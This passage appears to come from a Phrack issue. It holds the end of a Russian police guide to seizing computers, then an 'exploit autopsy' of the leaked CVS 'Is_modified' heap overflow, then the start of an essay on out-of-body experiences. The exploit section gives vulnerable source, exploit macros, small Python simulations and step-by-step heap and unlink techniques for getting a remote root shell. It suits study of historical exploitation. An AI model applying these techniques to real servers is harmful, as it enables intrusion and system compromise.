  increasing performance speed) and describe this data in the raid
  protocol;


- define presence of remote system access devices and also their
  current state (local network connection, modem presence), after which
  disconnect the computer and modem, describing the results of that in
  the protocol;


- copy programs and files from the virtual drive (if present) to a
  floppy disk or to a separate directory of a hard disk;


- turn the computer off and continue with examining it. During this it is
  necessary to describe in the raid protocol and appended scheme the
  location of the computer and peripheral devices (printer, modem,
  keyboard, monitor etc.), the purpose of every device, name, serial
  number, configuration (presence and type of disk drives, network cards,
  slots etc.), presence of connection to local computing network and
  (or) telecommunication networks, state of devices (are there traces
  of opening);


- accurately describe the order of interconnection of the mentioned
  devices, marking (if necessary) connector cables and plug ports, and
  disconnect computer devices;


- define, with the help of a specialist, presence of nonstandard
  apparatus inside the computer, absence of microschemes, disabling of
  an inner power source (an accumulator);


- pack (describing in the protocol the location where they were found)
  storage disks and tapes. Package may be a special diskette tray and
  also common paper and plastic bags, excluding ones not preventing the
  dust (pollutions etc.) contact with disk or tape surface;


- pack every computer device and connector cable. To prevent unwanted
  individuals' access, it is necessary to place stamps on the system
  block - seal the power button and power plug slot with adhesive tape
  and seal the front and side panels mounting details (screws etc.) too.


If it is necessary to turn computer back on during examination, startup 
is performed with a prepared boot diskette, preventing user programs 
from start. 


* winchester - obsolete mainstream tech speak for a hard drive. Seems to 
be of western origin but i never met this term in western sources. A common
abbreviation is "wint".


----[ 2.3. Expertise Assignment. 


Expertise assignment is an important investigation measure for such
cases. The general and most important part of such an expertise is the
technical program (computer technics) expertise. MVD (*) divisions have
no experts conducting such expertises at the current time, so it
is possible to conduct such type of expertises at FAPSI divisions
or to involve adequately qualified specialists from other organisations.


Technical program expertise is to find answers to the following:


- What information do the floppy disks and system blocks presented to
  expertise contain?

- What is its purpose and possible use?

- What programs do the floppy disks and system blocks presented to
  expertise contain?

- What is their purpose and possible use?

- Are there any text files on the floppy disks and system blocks
  presented to expertise?

- If so, what is their content and possible use?

- Is there destroyed information on the floppy disks presented to
  expertise?

- If so, is it possible to recover that information?

- What is that information and what is its possible use?

- What program products do the floppy disks presented to expertise
  contain?

- What are their content, purpose and possible use?

- Are there among those programs ones customized for password guessing
  or otherwise gaining unauthorized access to computer networks?

- If so, what are their names, work specifications, possibilities of
  usage to penetrate the defined computer network?

- Is there evidence of defined program usage to penetrate the
  abovementioned network?

- If so, what is that evidence?

- What is the chronological sequence of actions necessary to start the
  defined program or to conduct the defined operation?

- Is it possible to modify program files while working in a given
  computer network?

- If so, what modifications can be done, how can they be done and from
  what computer?

- Is it possible to gain access to confidential information through
  the mentioned network?

- How is such access gained?

- How was criminal penetration of the defined local computer network
  committed?

- What is the evidence of such penetration?

- If this penetration involved remote access, what are the possibilities
  of identifying an originating computer?

- If evidence of a remote user intrusion is absent, is it possible
  to point out computers from which such operations can be done?


Questions may be asked about compatibility of this or that program,
possibilities of running a program on a defined computer etc. Along with
these, experts can be asked about the purpose of this or that device
related to computer technics:


- What is the purpose of a given device, its possible use?

- What is special about its construction?

- What parts does it consist of?

- Is it an industrial or a homemade product?

- If it is a homemade device, what kind of knowledge and in what kind of
  science and technology does its maker possess, what is his professional
  skill level?

- With what other devices could this device be used together?

- What are the technical specifications of a given device?


The given methodic recommendations are far from a complete list of
questions that could be asked in such investigations but still do reflect
the important aspects of such type of criminal investigation.


* MVD (Ministry of Internal Affairs) - Russian police force.


The art of Exploitation:
Come back on an exploit


by vl4d1m1r of Ac1dB1tch3z


Dear Underground, starting from this release, the Circle of Lost Hackers
decided to publish in each release a come back on a public exploit known
for a long time. This section could be called 'autopsy of an exploit'.


The idea is to explain the technical part of a famous exploit as well
as its story, post-mortem. Here we start with the CVS "Is_modified"
exploit which leaked in 2004.


PRELUDE 
Exploitation is an art. 


Coding an exploit can be an art form in itself. To code a true exploit,
you need total control over the system. To achieve this feat, we usually
need to understand, analyze and master every piece of the puzzle. Nothing
is left to chance. The art of exploitation is to make the exploit
targetless, ultimately oneshot. To go further than the simple pragmatic
exploitation. Make it more than a simple proof of concept shit. Put
all your guts in it. Try to bypass existing protection techniques.


A nice exploit is a great artwork, but confined to stay in the shadow.
The inner workings are only known by its authors and the rare code readers
searching to pierce its mysteries. It's for the latter ones that this
section was created. For the ones who are hungry about the information
that hides behind the source code.


This is the only reason behind the "r34d 7h3 c0d3 d00d" of the usage()
function in this exploit: to force people to read the code, appreciate
what they have in hand. Not to provide them new tools or new weapons
but to make them understand the various technical aspects of it.


Each exploit is built following a particular methodology. We need to
deeply analyze all the possibilities of the memory allocations until we
master all of its parameters, often to a point where even the original
programmers were ignoring these technical aspects. It is about venturing
yourself in the twists and turns, the complexity of the situation and
finally discovering all the various opportunities that are available to
you. To see what fate has to offer us, the various potentials at our
disposal. To make something out of it. Try to take out the best from
the situation. When you get through this invisible line, the line
that separates the simple proof of concept code from the best exploit
possible, the one that guarantees you a shell every time, you can
then say that the creation of an art form has just begun. The joy of
gazing at your own piece of work leveraging a simple memory overwrite
to a full workable exploit. It is a technical jewel of creativity and
determination to bring a small computer bug to its full potential.


Who has never rooted a server with the exploit 'x2'? Who never waited
in front of his screen, watching the different steps, waiting for it to
realize the great work it was made for? But, how many people really
understood the dichotomies of 'x2' and how it worked? What was really
happening behind what was printed on the screen, in this unfinished
version of the exploit that got leaked and abused?


Beyond the pragmatic kiddie who wants to get an access, this section
aims at being the home for those who are motivated by curiosity, by
the artistic sensibility at such exploits. This section is not meant
to teach others how to own a server, but instead to teach them how the
exploit is working. It is a demystification of the few exploits that
leaked in the past of the underground to end up in the public domain. It
is about exploits that have been over exploited by a mass of incompetent
people. This section is for people who can see, not for people who are
only good at fetching what really has value.


In fact, this section is about doing justice to the original exploit.
It is a return on what really deserves attention. At a certain point
in time, the required level of comprehension to achieve a successful
exploitation reaches the edge of insanity. The spirit melts with madness,
we temporarily lose all kind of rationality and we enter a state of
illumination.


It's the fanaticism of the passionate that brings this to its full extent,
at its extreme, to demonstrate that it's possible to transcend the well
known, to prove we can always achieve more. It is about pushing the
limits. And then we enter the artistic creation.


No, we are not moving away, but we are instead getting closer to the 
reality that hides behind an exploit. Only a couple of real exploits 
have been made public. The authors of them are generally smart enough 
to keep them private. Despite this, leaks happen for various reasons 
and generally it’s a beginner error. 


The real exploit is not the one that has 34 targets, but only one, namely
all at the same time. An exploit that takes a simple heap overflow and
makes it work against GRsec, remotely and with ET_DYN on the binary. You
will probably use this exploit only once in your whole life, but the
most important part is the work accomplished by the authors to create it.
The important part is the love they put in creating it.


Maybe you'll learn nothing new from this exploit. In fact, the real
goal is not to give you new exploitation techniques. You are grown up
enough to read manuals, find your own techniques, make something out of the
possibilities offered to you. The goal is simply to give back some praise
to this arcane, obscure code forsaken by most people, these
pieces of code which have been disclosed but still stay misunderstood.


A column with the underground spirit, the real, for the expert and the 
lover of art. For the one who can see. 


The CVS "Is_modified" exploit
vl4d1m1r of ac1db1tch3z


vd@phrack.org


1 - Overview 


2 - The story of the exploit 


3 - The Linux exploitation: Using malloc voodoo 


4 - A couple of words on the BSD exploitation 


5 - Conclusion


--[ 1 - Overview


We will, through this article, show you how the exploitation under the
Linux operating system was made possible, and then study the BSD case.
Both exploitation techniques are different and they both lead to a
targetless and "oneshot" scenario. Remember that the code is 3 years
old. I know that since then, the glibc library has included a lot of
changes in its malloc code. Foremost, with glibc 2.3.2, the flag MAIN_ARENA
appeared, the FRONTLINK macro was removed and there was the addition
of a new linked list, the "fast_chunks". Then, since version 2.3.5,
the UNLINK() macro was patched in a way to prevent a "write 4 bytes to
anywhere" primitive. Last but not least, on the majority of the systems,
the heap is randomized by default along with the stack. But it was not
the case at the time of this exploit. The goal of this article, as it
was explained earlier, is not to teach you new techniques but instead to
explain to you what techniques were used at that time to exploit the bug.


--[ 2 - The story of the exploit 


This bug has originally been found by [CENSORED]. A first proof of concept
code was coded by kujikiri of ac1db1tch3z in 2003. The exploit was working
but only for a particular target. It was not reliable because not all the
parameters of the exploitable context were taken into account. The
main advantage of the code was that it could authenticate itself to the
CVS server and trigger the bug, which represents an important part in
the development of an exploit.


The bug was then shown to another member of the ac1db1tch3z team.
It's at that moment that we finally decided to code a really reliable
exploit to be used in the wild. A first version of the exploit was coded
for Linux. It was targetless but it needed about thirty connections
to succeed. This first version of the exploit submitted some addresses
to the CVS server in order to determine if they were valid or not by
checking whether the server crashed.


Then another member ported the exploit to the *BSD platform. As a
result, a targetless and "oneshot" exploit was born. As a challenge,
I tried to come up with the same result for the Linux version, and
my perseverance finally paid off. Meanwhile, a third member found an
interesting functionality in CVS, that won't be presented here, that gives
the possibility to bruteforce the three mandatory parameters necessary
for a successful exploitation: the cvsroot, the login and the password.


It took me one night of passion (nothing sexual) to gather all those 
three pieces of code into one, and the result was cvs_freebsd_linux.c, 
which was later leaked. Another member of the underground later coded a 
Solaris version, but without the targetless and "oneshot" functionality. 
This exploit won't be presented here.


This bug, as a matter of fact, was later "discovered" by Stefan Esser 
and disclosed by e-matters. We had a doubt that Stefan Esser himself
found that exact same bug which was known in the underground. Even if 
he hadn’t done so, he later redeemed himself while auditing the CVS 
source code with a fellow of his and by finding a certain number of 
other bugs. This proves he is able to find bugs, whatever. 


The code was finally made public by [CENSORED] who signed it with "The
Axis of Eliteness", and bragged about the fact that he already rooted
every interesting target currently available. It was not a great loss,
even though it was a pinch at the heart to see publicly that opensource
CVS servers got compromised.


--[ 3 - The Linux exploitation: Using malloc voodoo 


The original flaw was a basic heap overflow. Indeed, it was possible
to overwrite the heap with data under our control, and even to insert
non alphanumeric characters without buffer length restrictions. It was
a typical scenario.


Moreover, and that’s what is wonderful with the CVS server, by analyzing 
the different possibilities, we figured out that it was quite easy to 
force some calls to malloc() of an arbitrary size and choose the ones
that we want to free(), with little restrictions.


The funny thing is, when I originally coded the Linux version of
the exploit, I did not know that it was possible to overwrite the
memory space with completely arbitrary data. I thought that the only
character that you could overwrite memory with was 'M' (0x4d). I
had not analyzed the bug enough because I was quickly trying to find
an interesting exploitation vector with the information I already had
in my hands. Consequently, the Linux version exploits the bug like a
simple overflow with the 0x4d character.


The first difficulty that you meet with the heap is that it's pretty
unstable for various reasons. A lot of parameters change the memory
layout, such as the amount of memory allocations that were already
performed, the IP address of the server and other internal parameters of
the CVS server. Consequently, the first step of the process is to try
to normalize the heap and to put it in a state where we have complete
control over it. We need to know exactly what is happening on the remote
machine: to be sure about the state of the heap.


A small analysis of the possibilities that the heap offers us reveal this: 


I had to analyze the various possibilities of memory allocation offered by 
the CVS server. Fortunately, the code was quite simple. I quickly found, 
by analyzing all the malloc() and free() calls, that I could allocate 
memory buffers with the "Entry" command. 


The function that accomplishes this is serve_entry, the code is quite 
straightforward: 


    static void serve_entry (arg)
        char *arg;
    {
        struct an_entry *p;
        char *cp;

        [...]
        cp = arg;
        [...]
        p = xmalloc (sizeof (struct an_entry));
        cp = xmalloc (strlen (arg) + 2);
        strcpy (cp, arg);
        p->next = entries;
    [1] p->entry = cp;
        entries = p;
    }


Inside this function, which takes as an argument a pointer to a string 
that we control, there is a memory allocation of the following structure: 


    struct an_entry {
        struct an_entry *next;
        char *entry;
    };


Then, memory for the parameter will be allocated and assigned to the
field "entry" of the previously allocated "an_entry" structure that we
already defined, as you can see in [1]. This structure is then added
to the linked list of entries tracked by the global variable "struct
an_entry * entries".


Therefore, if we are Ok with the fact that small "an_entry" structures 
are getting allocated in between our controlled buffers, we can then 
use this vector to allocate memory whenever we want. 


Now, if we want to call a free(), we can use the CVS "noop" command which 
calls the "server_write_entries()" function. Here is a code snippet from 


15.txt Wed Apr 26 09:43:45 2017 5 


this function: 


    static void server_write_entries ()
    {
        struct an_entry *p;
        struct an_entry *q;

        [...]
        for (p = entries; p != NULL; )
        {
            [...]
            free (p->entry);
            q = p->next;
            free (p);
            p = q;
        }
        entries = NULL;
    }


As you can see, all the previously allocated entries will now be freed.
Note that when we talk about an 'entry' here, we refer to a pair: a
struct an_entry and its ->entry field that we control.


Considering the fact that all the buffers that we allocated will be freed, 
this technique suits us well. Note that there were other possibilities 
less restrictive but this one is convenient enough. 


So, we know now how to allocate memory buffers with arbitrary data in it, 
even with non alphanumeric characters, and how to free them too. 


Let's come back to the original flaw that we have not described yet. The
vulnerable command was "Is_modified" and the function looked like this:


    static void serve_is_modified (arg)
        char *arg;
    {
        struct an_entry *p;
        char *name;
        char *cp;
        char *timefield;

        for (p = entries; p != NULL; p = p->next) {
    [1]     name = p->entry + 1;
            cp = strchr (name, '/');
            if (cp != NULL
                && strlen (arg) == cp - name
                && strncmp (arg, name, cp - name) == 0)
            {
                if (*timefield == '/') {
                    [...]
                    cp = timefield + strlen (timefield);
                    cp[1] = '\0';
                    while (cp > timefield) {
    [2]                 *cp = cp[-1];
                        --cp;
                    }
                }
                *timefield = 'M';
                break;
            }
        }
    }


As you can see, in [2], after adding an entry with the "Entry" command, 
it was possible to add some ’M’ characters at the end of the entries 
previously inserted in the "entries" linked list. This was possible for 
the entries of our choice. The code is explicit enough so I don’t detail 
it more. 


We now have all the necessary information to code a working exploit. 
Immediately after we have established a connection, the method used to 
normalize the heap and put it in a known state is to use the "Entry" 
command. With this particular command, we can add buffers of an arbitrary 
size. 


The fill_heap() function does this. The macro MAX_FILL_HEAP tells the 
maximum number of holes that we could find in the heap. It is set at a
high value, to anticipate for any surprise. We start by allocating many 
big buffers to fill the majority of the holes. Then, we continue to 
allocate a lot of small buffers to fill all the remaining smaller holes. 


At this stage, we have no holes in our heap.


Now, if we sit back and think a little bit, we know that the heap layout
will look something like this:


[...] [an_entry] [buf1] [an_entry] [buf2] [an_entry] [bufn] [top_chunk]


Note : During the development of the exploit, I modified the malloc 
code to add functions of my own that I preloaded with LD_PRELOAD. This 
modified version would then generate various heap schemes to help me 
debug the heap. Note that some hackers use heap simulators to know the 
heap state during the development process. These heap simulators can be 
simply a gdb script or something using the libncurses. Any tool which
can represent the heap state is useful.


Once the connection was established and the fill_heap() function was
called, we knew the exact layout of the heap.


The challenge was now to corrupt a malloc chunk, insert a fake chunk
and make a call to free() to trigger the UNLINK() macro with 'fd' and
'bk' under our control. This would let us overwrite 4 arbitrary bytes
anywhere in memory. This is quite easy to do when you have the heap
in a predictable state. We know that we can overflow "an_entry->entry"
buffers of our choice. We will also inevitably overwrite what's located
after this buffer, either the top chunk or the next "an_entry" structure
if we have previously allocated one with another "Entry". We will try to
use the latter technique because we don't want to corrupt the top chunk.


Notice: Nowadays, since the UNLINK macro contains security checks,
we could instead use an overflow of the top chunk and trigger a call to
set_head() to exploit the program, as explained in another article of
this issue.


Practically, we know that chunk headers are found right before the 
allocated memory space. Let’s focus on the interesting part of the memory 
layout at the time of the overflow: 


[struct malloc_chunk] [an_entry] [struct malloc_chunk] [buf] [...] [top_chunk] 


By calling the function "Is_modified" with the name of the entry that we
want to corrupt, we will overwrite the malloc chunk header of the
"an_entry" structure located after the current buffer. So, the idea is to
overwrite the "size" field of the chunk holding a struct an_entry, so that
it becomes bigger than before. When free() computes the offset to the next
chunk, it will then fall directly inside the controlled part of the ->entry
field of this struct an_entry. So, we only need to add an "Entry" with a
fake malloc chunk at the right offset. See:


    #define NUM_OFF7       (sizeof("Entry "))
    #define MSIZE          0x4c
    #define MALLOC_CHUNKSZ 8
    #define AN_ENTRYSZ     8
    #define MAGICSZ        ((MALLOC_CHUNKSZ * 2) + AN_ENTRYSZ)
    #define FAKECHUNK      MSIZE - MAGICSZ + (NUM_OFF7 - 1)


The offset is FAKECHUNK.


Let’s sum up all the process at this point: 


1. The function fill_heap() fills all the holes in the heap by sending
   a lot of entries thanks to the Entry command.


2. We add 2 entries : the first one named "ABC", and another one with the 
name "dummy". The ->entry field of "ABC" entry will be overflowed and 
so the malloc_chunk of the struct an_entry "dummy" will be modified. 


3. We call the function "Is_modified" with "ABC" as a parameter, numerous
   times in a row until we hit the size field of the malloc_chunk.
   This has the effect of adding 'M' at the end of the buffer, outside
   its bounds. Inside the ->entry field of the "dummy" entry we have
   a fake malloc_chunk at the FAKECHUNK offset.


4. If we now call the function "noop", it will have the effect of freeing
   the linked list "entries". Starting from the end, the entry "dummy"
   and its associated "an_entry" structure, then the entry "ABC" and its
   associated "an_entry" structure will be freed. Finally, all the
   "an_entry" structures that we used to fill the holes in the heap will
   also be freed. So, the magic occurs during the free of the an_entry of
   "dummy".


The exact malloc voodoo is like this:


We have overwritten with 'M' characters the "size" field of the malloc
chunk of the "an_entry" structure next to our "ABC" buffer. From there,
when we free() the "an_entry" structure that had its "size" field
corrupted, free() will try to get to the next memory chunk at the address
of the chunk + 'M'. It will bring us exactly inside a buffer that we have
control on, which is the buffer "dummy". Consequently, if we can insert
a fake chunk at the right offset, we are able to write 4 bytes anywhere
in memory.


From this point, 90% of the job is already done! 


Notice: Practically, it is not enough to only create a fake next chunk.
You need to make sure a second next chunk is also available. Indeed,
DLmalloc is going to check the PREV_INUSE bit of the second next chunk
to check if the next chunk buffer is free or occupied. The problem is
that we can not put '\0' characters inside the fake chunk, so we need
to put a negative size field, to make sure that the next chunk of the
next chunk is before the first chunk. Practically, it works and I have
used this technique many times to code heap overflows. Check the macro
SIZE_VALUE inside the exploit code for more information. Its value is -8.


Now, we will dig a little bit deeper inside the exploit. Let’s take a 
look at the function detect_remote_os(). 


Here is the code: 


    int detect_remote_os(void)
    {
        info("Guessing if remote is a cvs on a linux/x86...\t");
        if (range_crashed(0xbfffffd0, 0xbfffffd0 + 4) ||
            !range_crashed(0x42424242, 0x42424242 + 4))
        {
            printf(VERT"NO"NORM", assuming it's *BSD\n");
            isbsd = 1;
            return (0);
        }
        printf(VERT"Yes"NORM" !\n");
        return (1);
    }


With this technique, we will trigger an overwrite operation to an
address that is always valid. This location will be a high address inside
the stack, for example 0xbfffffd0. If the server answers properly, it
means it did not crash. If it did not crash despite the overflow,
it either means that the UNLINK call worked (i.e. we are under
Linux with a stack mapped below 0xc0000000) or that the UNLINK call did
not get triggered (= not Linux).


To verify this, we will then try to write to an invalid, non mapped 
address, such as 0x42424242. If the server crashes, then we know for 
sure that the exploit does work correctly and that we are now on a Linux 
system. If it’s not the case, we switch to the FreeBSD exploitation. 


Right now, the only thing that we are able to do is to trigger a call 
to UNLINK in a reliable way and to make sure that everything is working 
properly. We now need to get more serious about this, and get to the 
exploitation process. 


Generally, to successfully exploit such a vulnerability, we need to
know the address of the shellcode and the address of a function pointer
in memory to overwrite. By digging more into the problem, it is always
possible to make the exploit work with only one address instead of two.
It may even be possible to make it work without providing any memory
addresses! Here is the technique used to accomplish such a feat.


Indeed, we are able to allocate an infinite number of buffers next to
each other, to corrupt their chunk headers and to free() them afterwards
with server_write_entries(). Being able to do this means that we can
trigger more than one call to UNLINK, and this is what is going to make
the difference. Being able to overwrite more than one memory address is
a technique frequently used inside heap overflow exploits and usually
makes the exploit targetless. In the following lines, I will explain
how this behavior can lead us to the creation of the memcpy_remote()
function, which takes the same arguments as the famous memcpy() function
with the exception that it writes in the memory space of the exploited
process. When we are able to trigger as many UNLINK calls as we want,
we will see that it's possible to turn the exploitation scenario into a
"write anything anywhere" primitive.


What are the benefits of being able to do this? 


If we can write what we want at the address that we want, without any
size constraints, we can copy the shellcode into memory. We will write
it at a really low address of the stack, and I will explain why later.
Since we do not know exactly which address to overwrite, we will
overwrite the majority of the stack with addresses that point to the
beginning of the shellcode. That way, we will overwrite the saved
instruction pointer from a call to free() and we will obtain control
of %eip.


All the art of this exploitation resides in the advanced use of the
UNLINK macro. We will go into the details, but first, let’s recall the
purpose of the UNLINK macro. The UNLINK macro takes an entry off the
doubly linked list. The "prev" pointer of the chunk following the one
we want to unlink is replaced by the "prev" pointer of the chunk we are
currently unlinking. Likewise, the "next" pointer of the chunk preceding
the one we want to unlink is replaced by the "next" pointer of the chunk
we are currently unlinking.


Remember that only free malloc chunks are in the doubly linked lists,
which are themselves grouped into bins.


The "prev" field is named BK and is located at offset 12 of a malloc
chunk. The "next" field is named FD and is at offset 8 of a malloc chunk.


We can then obtain the following macros: 


    #define CHUNK_FD    8
    #define CHUNK_BK    12
    #define SET_BK(x)   (x - CHUNK_FD)
    #define SET_FD(x)   (x - CHUNK_BK)


If we want to write 0x41424344 at 0x42424242, we need to call the UNLINK 
macro the following way: 


    UNLINK(SET_FD(0x41424344), SET_BK(0x42424242)).


The thing is that we want to write "ABCD" at 0x42424242, but UNLINK will 
write both at 0x42424242 and at 0x41424344. "ABCD" is not a valid address. 
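

The double write can be checked with a toy model. The sketch below is
only an illustration and is not taken from the exploit: it represents
memory as a Python dictionary of 32-bit words and replays the two stores
of the classic dlmalloc unlink step (FD->bk = BK, then BK->fd = FD),
using the offsets and macros given above. The helper names unlink(),
set_fd() and set_bk() are ours.

```python
CHUNK_FD = 8    # offset of the "next" (FD) pointer inside a free chunk
CHUNK_BK = 12   # offset of the "prev" (BK) pointer inside a free chunk


def set_bk(x):
    """Mirror of the SET_BK macro from the text."""
    return x - CHUNK_FD


def set_fd(x):
    """Mirror of the SET_FD macro from the text."""
    return x - CHUNK_BK


def unlink(words, fd, bk):
    """Replay the two stores of the unlink step on a dict of 32-bit words."""
    words[fd + CHUNK_BK] = bk   # FD->bk = BK
    words[bk + CHUNK_FD] = fd   # BK->fd = FD
    return words


if __name__ == "__main__":
    touched = unlink({}, set_fd(0x41424344), set_bk(0x42424242))
    for addr in sorted(touched):
        print(f"word written at 0x{addr:08x}")
```

In this model both 0x41424344 and 0x42424242 receive a store, which is
why a value such as "ABCD" cannot be used directly: it would have to be
a writable address as well.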


The solution to mitigate this problem is to write one character at a
time. We will thus write "A", then "B", then "C" and after this "D",
until there is nothing left to write. To achieve this, we need a range
of 0xFF bytes that we are willing to trash. It is easy to obtain.
Indeed, if we take a really high address in the stack, we will find
ourselves overwriting the environment variables that are stored at the
top of the stack.


At the time, we were writing this exploit for stacks that were mapped
just below the kernel space / user space boundary, which was 0xc0000000.
The exact address that I chose was 0xc0000000 - 0xFF.


Basically, if we want to write "ABCD" at 0xbfffd000, we will need to
execute the following calls to UNLINK:


    UNLINK(UNSET_FD(0xbfffd000), UNSET_BK(0xbfffff41))
    (0x41 being the hexadecimal equivalent of ’A’).


    UNLINK(UNSET_FD(0xbfffd001), UNSET_BK(0xbfffff42))
    (0x42 being the hexadecimal equivalent of ’B’).


And so on.


So, if we are able to execute as many UNLINK calls as we want, and if we
have a range of 0xFF addresses that can be modified without consequences
on program execution, then we are able to make memcpy() calls remotely.
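

The byte-at-a-time idea can be simulated entirely in-process. The sketch
below is our own reconstruction under stated assumptions, not the code of
the exploit: memory is a sparse little-endian model, SCRATCH is a
hypothetical base for the range we accept to trash, and the way FD and BK
are derived (FD = destination - 12, BK = SCRATCH | byte) is our reading
of the calls above and may differ from what UNSET_FD and UNSET_BK really
do. Only the name memcpy_remote() comes from the text.

```python
import struct

CHUNK_FD = 8            # offset of the "next" (FD) pointer in a free chunk
CHUNK_BK = 12           # offset of the "prev" (BK) pointer in a free chunk
SCRATCH = 0xBFFFFF00    # hypothetical base of the range we accept to trash


class Memory:
    """Sparse model of a 32-bit little-endian address space."""

    def __init__(self):
        self.cells = {}

    def store32(self, addr, value):
        for i, b in enumerate(struct.pack("<I", value)):
            self.cells[addr + i] = b

    def read(self, addr, size):
        return bytes(self.cells.get(addr + i, 0) for i in range(size))


def unlink(mem, fd, bk):
    """Replay the two 32-bit stores of the unlink step."""
    mem.store32(fd + CHUNK_BK, bk)   # FD->bk = BK
    mem.store32(bk + CHUNK_FD, fd)   # BK->fd = FD


def memcpy_remote(mem, dst, data):
    """Copy data to dst, one byte per simulated unlink."""
    for i, byte in enumerate(data):
        # The low byte of BK is the data byte; it lands at dst + i.
        # The mirror store lands at BK + 8, around the scratch range.
        unlink(mem, fd=dst + i - CHUNK_BK, bk=SCRATCH | byte)


if __name__ == "__main__":
    mem = Memory()
    memcpy_remote(mem, 0xBFFFD000, b"ABCD")
    print(mem.read(0xBFFFD000, 4))
```

Each store is four bytes wide, so every write also deposits three bytes
of the scratch address after the data byte. The next iteration overwrites
them, except after the last byte, where three bytes past the end of the
destination stay clobbered in this simplified model.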


To sum up: 
1. We normalize the heap to put it in a predictable state. 


2. We overwrite the size field of a previously allocated chunk holding an
"an_entry" struct. When this an_entry entry is free()d, the
memory allocator will think that the next chunk is located inside data
under our control. This fake next chunk will then be seen as free,
and the two memory blocks will be consolidated into one. Malloc will
then take the next chunk off its doubly linked list of free chunks,
and it will thus trigger an UNLINK, with FD and BK under our control.


3. Since we can allocate as many "an_entry" entries as we want and free 
them all at the same time thanks to server_write_entries(), we can 
trigger as many UNLINK as we want. This leads us, as we just saw, 
to the creation of the memcpy_remote() function, that will let us 
write what we want and where we want. 


4. We use the function memcpy_remote() to write the shellcode at a really 
low address of the stack. 


5. We then overwrite each address in the stack, starting from the top,
until we hit a saved instruction pointer.


6. When the internal function that frees the chunk returns, our
shellcode will then be executed.


Here it is!


Notice: We have chosen a really low address in the stack because, even
if we hit an address that is not currently mapped, this will only
trigger a page fault: instead of aborting the program with a signal 11,
the kernel will stretch the stack with its expand_stack() function.
This method is OS generic. Thanks bbp.


--[ 4 - A couple of words on the BSD exploitation 


As promised, here is the explanation of the technique used to exploit the
FreeBSD version. Note that with only minor changes, this exploit also
worked on other operating systems. In fact, by switching the shellcode
and modifying the hardcoded high addresses of the heap, the exploit was
fully functional on every system using PHK malloc. This exploit was not
restricted to FreeBSD, something the script kiddies didn’t know.


I like to see this kind of trick inside exploits. It makes them powerful
for the expert, and almost useless to the kiddie.


The technique explained here is an excellent way to take control of the 
target process, and it could have been easily used in the Linux version 
of the exploit. The main advantage is that this method does not use the
magic of voodoo, so it can help you bypass the security checks done by
the malloc code. 


First, the heap needs to be filled to put it in a predictable state, like
for all heap overflow exploits. Secondly, what we basically want to do
is to put a structure containing function pointers right behind the buffer
that we can overflow, in order to rewrite those function pointers. In this
case, we overwrote the function pointers entirely and not partially.


Once this is done, the only thing that remains to be done is to repeatedly
send big buffers containing the shellcode, to make sure it will be
available at a high address in the heap.


Afterwards, we need to overwrite the function pointer and to trigger the
use of this same function. As a result, the shellcode will be run.


Practically, we used the CVS command "Gzip-stream" that allocated an 
array of function pointers, inside a subroutine of the serve_gzip_stream() 
function. 


Let’s recap: 
1. We fill_holes() the PHK’s malloc allocator so that the buffer that
we are going to overwrite is before a hole in the heap.


2. We allocate the buffer containing 4 pointers to shellcode at the right 
place. 


3. We call the function "Gzip-stream" that will allocate an array of 
function pointers right inside our memory hole. This array will be 
located right after the buffer that we are going to overflow. 


4. We trigger the overflow and we overwrite a function pointer with the 
address of our shellcode (the macro HEAPBASE in the exploit). 
See OFFSET variable to know how many bytes we need to overflow. 


5. With the "Entry" command, we add numerous entries that contain NOPs and 
shellcode to fill the higher addresses of the heap with our shellcode. 


6. We call the zflush(1) function, which ends the gzipped stream and
triggers an overwritten function pointer (the zfree one of the struct
z_stream). And so we retrieve a shell. If we are not yet root, we check
whether a cvs passwd file is writable somewhere in the cvs tree, which
was the case at the time on most servers, and we modify it to obtain a
root account. We re-exploit the cvs server with this account and -
yes it is - we have r00t on the remote. :-)

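

The core of steps 2 to 4 (a buffer followed in memory by an array of
function pointers, then an unchecked copy into the buffer) can be
pictured with a harmless in-process model. Everything below is a sketch
with hypothetical values: the buffer size, the number of pointers and
both addresses are made up, and HEAPBASE only borrows the name of the
macro mentioned in the text. It does not reproduce PHK malloc or CVS.

```python
import struct

BUF_SIZE = 16            # hypothetical size of the overflowable buffer
N_POINTERS = 4           # hypothetical number of function pointers
LEGIT = 0x08050000       # hypothetical address of the legitimate callbacks
HEAPBASE = 0x08100000    # hypothetical high heap address holding the payload
TABLE_FMT = "<%dI" % N_POINTERS   # N little-endian 32-bit pointers


def make_heap():
    """Lay out a buffer immediately followed by an array of pointers."""
    table = struct.pack(TABLE_FMT, *([LEGIT] * N_POINTERS))
    return bytearray(BUF_SIZE) + table


def unchecked_copy(heap, data):
    """Copy data to the start of the buffer without any bounds check."""
    heap[0:len(data)] = data


def pointer_table(heap):
    """Return the function pointers currently stored after the buffer."""
    return list(struct.unpack_from(TABLE_FMT, heap, BUF_SIZE))


def overflow_payload():
    """Filler for the buffer, then one fake pointer per table slot."""
    fake = struct.pack(TABLE_FMT, *([HEAPBASE] * N_POINTERS))
    return b"A" * BUF_SIZE + fake


if __name__ == "__main__":
    heap = make_heap()
    print([hex(p) for p in pointer_table(heap)])
    unchecked_copy(heap, overflow_payload())
    print([hex(p) for p in pointer_table(heap)])
```

After the copy, every slot of the table holds the HEAPBASE value, so any
later call through one of these pointers would be redirected there. This
is the role played by the overwritten z_stream pointer in the recap.
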
--[ 5 - Conclusion 


We thought that it was worth presenting the exploit the way it was done 
here, to let the reader learn by himself the details of the exploitation 
code, which is from now on available in the public domain, even though 
the authors did not want it. 


From now on, this section will be included in the upcoming releases of
phrack. Each issue, we will present the details of an interesting exploit.
The exploit will be chosen because its development was interesting and
the author(s) had a strong determination to succeed in building it. Such
exploits can be counted on the fingers of your hands (I am talking about
the leaked ones). With the hope that you had fun reading this.


--[ 6 - Greeting 


To MaXX for his great papers on DL malloc.


Hacking your brain:
The projection of consciousness 


by keptune 


Dear Underground, for this new Phrack issue, The Circle of Lost
Hackers has decided to start one more new section entitled "Hacking
your brain". We already hear you: "what the hell does this subject have
to do with computer hacking???". Well, as we already mentioned in
other articles, for us hacking is not only computer hacking, it is
much more.


The following article, as you will understand, talks about out of body
experiences. By publishing this article in a magazine like phrack, we
know that it will bring scepticism. The author, in this article, claims
that such out of body experiences are possible. One of the main rules
of the underground is to not be blind and trust everything simply because
an authority claims it, but to try everything by yourself, with criticism
and a totally open mind. That is why, for us, unreasoning credulity is
something more blameworthy than a presumptuous sceptic who rejects
facts without examining whether they are real.


Even if an out of body experience is interesting in itself, what is more
interesting are the new implications that it leads to. It is unrecognized
by current science even though it has been known for ages. If the
